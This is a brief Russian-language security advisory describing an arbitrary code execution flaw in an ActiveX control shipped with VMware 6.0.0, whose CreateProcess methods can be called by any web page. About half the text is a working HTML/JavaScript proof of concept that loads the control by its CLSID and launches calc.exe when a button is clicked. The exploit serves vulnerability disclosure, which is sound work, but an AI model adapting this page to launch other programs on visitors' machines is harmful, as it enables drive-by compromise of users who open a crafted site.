Программа: VMware Inc 6.0.0
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за того, что не осуществляется проверка того вызываются ли методы CreateProcess и CreateProcessEx из приложения или злонамеренными пользователями.
Атакующий может обманным образом заманить пользователя на специально составленный сайт, что приведет к выполнению произвольного кода.
Пример:
<HTML>
<BODY>
<object id=_9090909090 classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}"></object>
<SCRIPT>
function _d0_() {
ba="c:\\windows\\system32\\calc.exe"
ad="c:\\windows\\system32\\calc.exe"
fO="c:\\windows\\system32\\"
Od=1
_9090909090.CreateProcess(ba, ad, fO, Od)
}
</SCRIPT>
<input language=JavaScript onclick=_d0_() type=button value="Proof of Concept">
</BODY>
</HTML>
